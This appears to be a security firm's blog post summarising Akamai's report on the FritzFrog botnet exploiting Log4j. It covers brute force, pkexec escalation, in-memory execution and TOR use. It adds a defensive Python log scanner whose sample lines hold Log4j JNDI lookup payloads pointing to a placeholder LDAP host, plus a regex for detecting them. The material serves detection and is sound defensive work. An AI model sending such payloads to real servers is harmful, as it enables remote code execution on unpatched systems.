
FritzFrog Botnet Exploits Log4j


On February 1, 2024, Akamai Security Intelligence Group (SIG) reported that a variant of the FritzFrog botnet has been observed actively exploiting "Log4j" (CVE-2021-44228) as part of its attack chain. This threat stream targets unpatched instances, which may still be numerous across organizations.


Akamai's analysis highlights that the FritzFrog botnet has expanded its capabilities with new features:


  • FritzFrog carries out SSH brute-force attacks against weak credentials for initial intrusion. The malware has a variety of modules configured to target a large set of Java applications, including a dedicated module for exploiting Log4j on vulnerable instances. The malware scans for HTTP servers on ports 8080, 8090, 8888 and 9000. FritzFrog then triggers the vulnerability by causing the application to log a payload which, in turn, forces the Java application to connect to an attacker-controlled LDAP server, from which a malicious Java class is downloaded and executed.

  • Notably, a separate module targets CVE-2021-4034, a local privilege escalation in polkit's pkexec utility.

  • Ability to kill competing malware.

  • FritzFrog implemented a number of measures that reduce its footprint, including avoiding dropping files to the local disk. The malware leverages /dev/shm and memfd_create to execute the payload from memory without writing files to disk.

  • Network communication over TOR.
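A defender-side check for the Log4j exploitation step described above, as an added example that is not part of the original post or of Akamai's analysis: it sweeps constructed web access-log lines for JNDI lookup strings in the attacker-controlled fields and flags requests that arrived on the ports the report says FritzFrog probes. The trailing destination-port field in the log format and the LDAP-HOST-PLACEHOLDER host are assumptions for the sample, not real indicators.

```python
import re
from urllib.parse import unquote

# Ports the report says FritzFrog probes for HTTP servers.
FRITZFROG_HTTP_PORTS = {8080, 8090, 8888, 9000}

# JNDI lookup token as vulnerable Log4j 2.x evaluates it; the scheme is captured
# so an analyst can see whether it points at LDAP as the report describes.
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.IGNORECASE)

# Combined log format plus one hypothetical trailing field: the destination port.
_LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<port>\d+)$'
)

def find_jndi_hits(log_text: str) -> list:
    """One record per line whose request line, Referer or User-Agent carries a
    JNDI lookup: all three are attacker-controlled and commonly logged."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the sweep
        port = int(m["port"])
        for field in ("req", "ua", "referer"):
            # Decode twice so single- and double-URL-encoded payloads both match.
            j = _JNDI.search(unquote(unquote(m[field])))
            if j:
                hits.append({"src": m["src"], "field": field, "port": port,
                             "scheme": j["scheme"].lower(),
                             "fritzfrog_port": port in FRITZFROG_HTTP_PORTS})
                break
    return hits

def probed_ports_by_source(hits: list) -> dict:
    """Sorted ports each source hit, to surface the port sweep behaviour."""
    out = {}
    for h in hits:
        out.setdefault(h["src"], set()).add(h["port"])
    return {src: sorted(ports) for src, ports in out.items()}

# Constructed sample log; LDAP-HOST-PLACEHOLDER stands in for the attacker host.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Feb/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" 8080
203.0.113.9 - - [01/Feb/2024:10:00:02 +0000] "GET /login HTTP/1.1" 404 0 "-" "${jndi:ldap://LDAP-HOST-PLACEHOLDER/a}" 8080
203.0.113.9 - - [01/Feb/2024:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2FLDAP-HOST-PLACEHOLDER%2Fa%7D HTTP/1.1" 404 0 "-" "curl/8.0" 9000
203.0.113.9 - - [01/Feb/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 100 "${jndi:ldap://LDAP-HOST-PLACEHOLDER/a}" "curl/8.0" 443
"""
```

Running find_jndi_hits(SAMPLE_LOG) flags three of the four lines, two of them on ports from the report's list, and probed_ports_by_source groups them to show a single source sweeping several ports.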




If you are interested in specifics or additional insights on the threats above or any other threat, please visit our dedicated service page or reach out to info@clipeusintelligence.com with your inquiry. We would be glad to assist you.
